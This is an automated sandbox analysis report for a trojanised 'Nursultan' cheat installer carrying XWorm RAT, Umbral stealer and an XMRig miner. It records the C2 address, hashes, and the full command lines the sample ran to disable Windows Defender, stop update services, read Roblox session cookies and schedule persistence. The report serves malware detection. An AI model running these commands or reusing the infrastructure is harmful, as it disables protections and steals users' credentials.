Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-06-2024 01:18

General

  • Target

    87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe

  • Size

    3.0MB

  • MD5

    6850a8c541b310a2f4a5cd88352856a3

  • SHA1

    372ff19e90cec46e37797b343fe6f537116b4aae

  • SHA256

    87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95

  • SHA512

    924d20cd368e797a771cf8b27b5e8994c62139a85a92ca068b64b0ac65598475b2225a81d08abb2aab9ad87f08d261f950219c16cee1b6d2e21c4b0c95eee4fa

  • SSDEEP

    49152:g97jAtnr1ky+cFvVnJxuw9APD764uBxsPqlRJiM4C/d7Nch8zmOqYmlMH9TLi:g9otJOc/Jxuw9g764ssPqlbiM46ch8z6

Malware Config

Extracted

Family

xworm

Version

5.0

C2

127.0.0.1:28223

unknown-sunglasses.gl.at.ply.gg:28223

Mutex

rVUJpGK3xHCE778M

Attributes
  • Install_directory

    %AppData%

  • install_file

    svchost.exe

aes.plain

Signatures

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Detects Windows executables referencing non-Windows User-Agents 1 IoCs
  • Detects executables attemping to enumerate video devices using WMI 2 IoCs
  • Detects executables containing possible sandbox analysis VM names 2 IoCs
  • Detects executables containing possible sandbox analysis VM usernames 2 IoCs
  • Detects executables containing possible sandbox system UUIDs 2 IoCs
  • Detects executables packed with unregistered version of .NET Reactor 2 IoCs
  • UPX dump on OEP (original entry point) 12 IoCs
  • XMRig Miner payload 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Drops file in Drivers directory 1 IoCs
  • Stops running service(s) 4 TTPs
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 7 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 13 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry class 9 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe
    "C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1828
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3628
    • C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      PID:4896
      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:3384
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        3⤵
          PID:1872
          • C:\Windows\system32\wusa.exe
            wusa /uninstall /kb:890830 /quiet /norestart
            4⤵
              PID:1376
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop UsoSvc
            3⤵
            • Launches sc.exe
            PID:4728
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop WaaSMedicSvc
            3⤵
            • Launches sc.exe
            PID:1820
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop wuauserv
            3⤵
            • Launches sc.exe
            PID:5032
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop bits
            3⤵
            • Launches sc.exe
            PID:2980
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop dosvc
            3⤵
            • Launches sc.exe
            PID:2952
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            3⤵
            • Power Settings
            PID:2844
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
            3⤵
            • Power Settings
            PID:1988
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            3⤵
            • Power Settings
            PID:3560
          • C:\Windows\system32\powercfg.exe
            C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
            3⤵
            • Power Settings
            PID:3552
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe delete "XMRKNZQC"
            3⤵
            • Launches sc.exe
            PID:4720
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe create "XMRKNZQC" binpath= "C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe" start= "auto"
            3⤵
            • Launches sc.exe
            PID:4364
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe stop eventlog
            3⤵
            • Launches sc.exe
            PID:2580
          • C:\Windows\system32\sc.exe
            C:\Windows\system32\sc.exe start "XMRKNZQC"
            3⤵
            • Launches sc.exe
            PID:3464
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1584
        • C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
          "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
          2⤵
          • Drops file in Drivers directory
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3508
          • C:\Windows\SYSTEM32\attrib.exe
            "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
            3⤵
            • Views/modifies file attributes
            PID:4220
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4796
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4488
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3868
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1292
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" os get Caption
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2588
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" computersystem get totalphysicalmemory
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3632
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" csproduct get uuid
            3⤵
              PID:3336
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:5092
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic" path win32_VideoController get name
              3⤵
              • Detects videocard installed
              PID:2104
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2528
              • C:\Windows\system32\PING.EXE
                ping localhost
                4⤵
                • Runs ping.exe
                PID:1448
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3536
          • C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
            "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
            2⤵
            • Drops startup file
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:4608
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
              3⤵
              • Drops startup file
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:744
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:4928
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MSBuild.exe'
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:1868
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:1944
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:4272
              • C:\Windows\SysWOW64\schtasks.exe
                "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
                4⤵
                • Scheduled Task/Job: Scheduled Task
                PID:2300
          • C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
            "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
            2⤵
            • Executes dropped EXE
            • Modifies registry class
            • Suspicious use of WriteProcessMemory
            PID:2040
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c cls
              3⤵
                PID:3020
          • C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
            C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
            1⤵
            • Executes dropped EXE
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            PID:2332
            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              2⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              • Suspicious behavior: EnumeratesProcesses
              PID:2144
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
              2⤵
                PID:2940
                • C:\Windows\system32\wusa.exe
                  wusa /uninstall /kb:890830 /quiet /norestart
                  3⤵
                    PID:464
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop UsoSvc
                  2⤵
                  • Launches sc.exe
                  PID:1320
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop WaaSMedicSvc
                  2⤵
                  • Launches sc.exe
                  PID:2336
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop wuauserv
                  2⤵
                  • Launches sc.exe
                  PID:1408
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop bits
                  2⤵
                  • Launches sc.exe
                  PID:1668
                • C:\Windows\system32\sc.exe
                  C:\Windows\system32\sc.exe stop dosvc
                  2⤵
                  • Launches sc.exe
                  PID:392
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                  2⤵
                  • Power Settings
                  PID:1448
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                  2⤵
                  • Power Settings
                  PID:1872
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                  2⤵
                  • Power Settings
                  PID:2756
                • C:\Windows\system32\powercfg.exe
                  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                  2⤵
                  • Power Settings
                  PID:4924
                • C:\Windows\system32\conhost.exe
                  C:\Windows\system32\conhost.exe
                  2⤵
                    PID:4536
                  • C:\Windows\system32\svchost.exe
                    svchost.exe
                    2⤵
                      PID:4220
                  • C:\Users\Admin\AppData\Roaming\svchost.exe
                    C:\Users\Admin\AppData\Roaming\svchost.exe
                    1⤵
                    • Executes dropped EXE
                    PID:2408
                  • C:\Users\Admin\AppData\Roaming\svchost.exe
                    C:\Users\Admin\AppData\Roaming\svchost.exe
                    1⤵
                    • Executes dropped EXE
                    PID:5108

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                    Filesize

                    2KB

                    MD5

                    d85ba6ff808d9e5444a4b369f5bc2730

                    SHA1

                    31aa9d96590fff6981b315e0b391b575e4c0804a

                    SHA256

                    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                    SHA512

                    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                    Filesize

                    2KB

                    MD5

                    968cb9309758126772781b83adb8a28f

                    SHA1

                    8da30e71accf186b2ba11da1797cf67f8f78b47c

                    SHA256

                    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

                    SHA512

                    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svchost.exe.log

                    Filesize

                    841B

                    MD5

                    0efd0cfcc86075d96e951890baf0fa87

                    SHA1

                    6e98c66d43aa3f01b2395048e754d69b7386b511

                    SHA256

                    ff981780f37479af6a428dd121eef68cf6e0b471ae92f080893a55320cc993f7

                    SHA512

                    4e79f5a8494aac94f98af8dbbc71bdd0a57b02103757ad970da7e7d4e6a0dc5015ca008256a6bd2c5bdec3a0f5736a994e17b3ef004b0f374a3339e480ac41b1

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Filesize

                    944B

                    MD5

                    d8cb3e9459807e35f02130fad3f9860d

                    SHA1

                    5af7f32cb8a30e850892b15e9164030a041f4bd6

                    SHA256

                    2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68

                    SHA512

                    045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Filesize

                    948B

                    MD5

                    c9b6705519e1eef08f86c4ba5f4286f3

                    SHA1

                    6c6b179e452ecee2673a1d4fe128f1c06f70577f

                    SHA256

                    0f9cad44a79126871580e19b01dc3f880c5173b1faaf8b9018d5d1f829714705

                    SHA512

                    6d8f85a7a8b0b124530f36a157cd0441b5c1eacdc35e274af9fbf0569d03d1d5e468651a5b2425f0215c282ecfa7b1ffeaeeaf18612822f00bd14306d30640c7

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Filesize

                    1KB

                    MD5

                    88be3bc8a7f90e3953298c0fdbec4d72

                    SHA1

                    f4969784ad421cc80ef45608727aacd0f6bf2e4b

                    SHA256

                    533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a

                    SHA512

                    4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Filesize

                    1KB

                    MD5

                    adb2d5e1a5595365546f2bcd774a5be5

                    SHA1

                    b15ab5a08855b1b630197471d7ca7f81df9b8d3e

                    SHA256

                    47ea8cc898d4c287d4bbf125ac8f8247e76c9b99e266e4b351948dd0ae05683a

                    SHA512

                    fdaa080e169569298012a97de1897e5369aa04650b6c0c29570c88007f7b3d85653dfa86efdc9943c74d37c392fb46c6afc629d31172f4c692539e32d99a1372

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Filesize

                    64B

                    MD5

                    8a424e81b5a6078deff05e153c04a0ee

                    SHA1

                    bf209de0dbc1dbe7c5b5b511bd34bf447a3c049b

                    SHA256

                    79ce6d6caea4a9eabf8fdbb2a1c58d43fb5a3c500c2dec3fce87c160d2c6bda3

                    SHA512

                    aa01195e5c1d641304b08fed4a3bffc916972aa0bc20e928204cef1783f38922a03b761cf2010ccbace1ea0d2f18cda4eaeee4d8969f32fbae5f580e4e38522d

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Filesize

                    18KB

                    MD5

                    ae9c6a04d93b4c896b37c718a3376bd9

                    SHA1

                    d2908ec0f67e6753e6e6e5c3cf8f4e0dedd078b4

                    SHA256

                    336394bc1f7d705a6c448d73afa81feb506a73124fcc3d1a66c106278cc6a5c6

                    SHA512

                    1936beb5cfcee3f92e7eb07abc1f81de45aa2b331e8dbbc10bb7120730a95ee3433de3136ffb9a1f5306c8af002af1a593d38acba375e5eb31129a48b14e1aa2

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Filesize

                    18KB

                    MD5

                    6ee93dad6026cd1d46e7c3c0f088eff9

                    SHA1

                    e9785ea3ca178050bf2f4f875702925b611c6ab3

                    SHA256

                    74cbc653b8c0f61b5ca03ebf4e77f73b885c81f5bea04dc671c3bdc750754b14

                    SHA512

                    8c41951e699ae2fb700fdb32fb3166310cf63c090274e5151f40db5ea0b1f3b2487d0d4f58d4cc90b8ef1b030bae687858d73d66107dac7a625f880037c634d8

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Filesize

                    18KB

                    MD5

                    69c616e3f57e1e1483a9af58346a75d8

                    SHA1

                    1a1954de5f69c99a37f819f5a5430cd52afaecf0

                    SHA256

                    529b7a6ee3ca4a565b1693b225dfddf3d23d7dfe9d0ad7f121e877cf14166e0c

                    SHA512

                    b2e84185eebb613c0fddb0a4de3658ad9d441f1f63dc2dece1035e44c51dd218144b288e016e4334683c26d24f45dcd39f7cdc74ae2b3760612fcdbfd04d37bb

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Filesize

                    18KB

                    MD5

                    31bfccb189f1cc148776a3a0a7852f86

                    SHA1

                    ceafe741dc1476fb1c6c7b40006979ed8d53d4af

                    SHA256

                    c95ed201b69c47ac163bc763259e1e69a2a3f18e529cac6e493594f609c836b3

                    SHA512

                    2773f6d7fd6dfa26520522f7aafb5f6f7c3a9d16ed812a0951d679cd2e9dc726600b557f53a5e42c2178e14bb9434bc1d862d4444ff0875a6d016401a404ce0e

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Filesize

                    944B

                    MD5

                    77d622bb1a5b250869a3238b9bc1402b

                    SHA1

                    d47f4003c2554b9dfc4c16f22460b331886b191b

                    SHA256

                    f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

                    SHA512

                    d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Filesize

                    944B

                    MD5

                    da5c82b0e070047f7377042d08093ff4

                    SHA1

                    89d05987cd60828cca516c5c40c18935c35e8bd3

                    SHA256

                    77a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5

                    SHA512

                    7360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                    Filesize

                    944B

                    MD5

                    4fc1ceefa94c82f73b7ee478e2920ea3

                    SHA1

                    17a031c8d10e316478d85d24ba8a8b5ebfda3149

                    SHA256

                    018553e7801fd476285775a4df59eb6a6c79774f6253d6dcbe9e4e96de3c96fb

                    SHA512

                    cd581f4b96e1eff3e1c8e75e9e67050060f9bdc92c2a4a0ca8282b4b1839fde9f7848cc262b8ef189466bdd51c0940be7392ae7f0278b2113d10ed590d11b311

                  • C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

                    Filesize

                    102KB

                    MD5

                    c137c5f5287d73a94d55bc18df238303

                    SHA1

                    95b4b01775bea14feaaa462c98d969eb81696d2c

                    SHA256

                    d294856177658df0159cfe937e5ea95a8ee8a2ca85754d897aea3bb5d0d962c0

                    SHA512

                    ba595d185ae98152658ce95964fd6bcce7e970896b0b1c674a142d126cf0433094debcd25527d9b4f5a6568cc5a8a42aeaef536166748eea3973f8b694564aa5

                  • C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

                    Filesize

                    2.5MB

                    MD5

                    a1d8db2a1ff742bc73dd5617083f5fde

                    SHA1

                    957b182d82efb40a36099dd886ad581977880838

                    SHA256

                    d715e599815190df86069fae7220db64b5999207f77fb6e41cfe318d34c7399a

                    SHA512

                    0c5407f5707e5f2808cf1d85d71815ca67d45edc8bd8a83cc424dc927afcbad6ced5a826fff81549e5684ca0ece039513c3351ce7bf231e37885f7ed04dc513f

                  • C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

                    Filesize

                    1.9MB

                    MD5

                    0df0a039309525fd27e1b5e056c92b6a

                    SHA1

                    7551c27a9123cb56c4218647966a753794ac2961

                    SHA256

                    a29379238f93fa6301dd390e635b0c1f53d9197c68adc0f00cbc52bb4311a23f

                    SHA512

                    2c00ea216368e254167bd5f2562cbc93953b9c4756765f4504aaae7e9dc45e5584fef1ddb174b651a9a090c7217424e5b80dec58f6f2493c54704f46c35fede6

                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q4lijxdj.ery.ps1

                    Filesize

                    60B

                    MD5

                    d17fe0a3f47be24a6453e9ef58c94641

                    SHA1

                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                    SHA256

                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                    SHA512

                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                  • C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

                    Filesize

                    229KB

                    MD5

                    f0b33cc162bfd36a995b8c90cd8ebff1

                    SHA1

                    ca1ddef08d47fc15a44a2d651b61e3decce8ebc6

                    SHA256

                    6363305dc75b8bf7aa2a8b31b0b0f38022fb0139f809ecba42e5cfe7530830e0

                    SHA512

                    1426cd246662adfd9aba4434586dc3bd54d31d395d9fafdcb15e785461a466567bff62e85085c36043cca047f951a96e5fc359c5cbf1000ff3121bba6b2905d0

                  • C:\Users\Admin\AppData\Roaming\svchost.exe

                    Filesize

                    256KB

                    MD5

                    8fdf47e0ff70c40ed3a17014aeea4232

                    SHA1

                    e6256a0159688f0560b015da4d967f41cbf8c9bd

                    SHA256

                    ed9884bac608c06b7057037cc91d90e4ae5f74dd2dbce2af476699c6d4492d82

                    SHA512

                    bd69d092ed4f9c5e1f24eaf5ec79fb316469d53849dc798fae0fcba5e90869b77ee924c23cc6f692198ff25827ab60ad47bb46cadd6e0aadde7731cbafb013be

                  • memory/744-288-0x0000000006990000-0x0000000006A22000-memory.dmp

                    Filesize

                    584KB

                  • memory/744-109-0x0000000000400000-0x0000000000412000-memory.dmp

                    Filesize

                    72KB

                  • memory/744-289-0x0000000006280000-0x000000000628A000-memory.dmp

                    Filesize

                    40KB

                  • memory/1828-83-0x00007FFD407B0000-0x00007FFD41271000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/1828-24-0x00007FFD407B0000-0x00007FFD41271000-memory.dmp

                    Filesize

                    10.8MB

                  • memory/1828-0-0x00007FFD407B3000-0x00007FFD407B5000-memory.dmp

                    Filesize

                    8KB

                  • memory/1828-1-0x00000000007F0000-0x0000000000AF0000-memory.dmp

                    Filesize

                    3.0MB

                  • memory/1868-229-0x00000000705A0000-0x00000000705EC000-memory.dmp

                    Filesize

                    304KB

                  • memory/1868-227-0x00000000061B0000-0x0000000006504000-memory.dmp

                    Filesize

                    3.3MB

                  • memory/1944-240-0x0000000005E60000-0x00000000061B4000-memory.dmp

                    Filesize

                    3.3MB

                  • memory/1944-251-0x00000000705A0000-0x00000000705EC000-memory.dmp

                    Filesize

                    304KB

                  • memory/2144-328-0x0000017A2EB30000-0x0000017A2EB38000-memory.dmp

                    Filesize

                    32KB

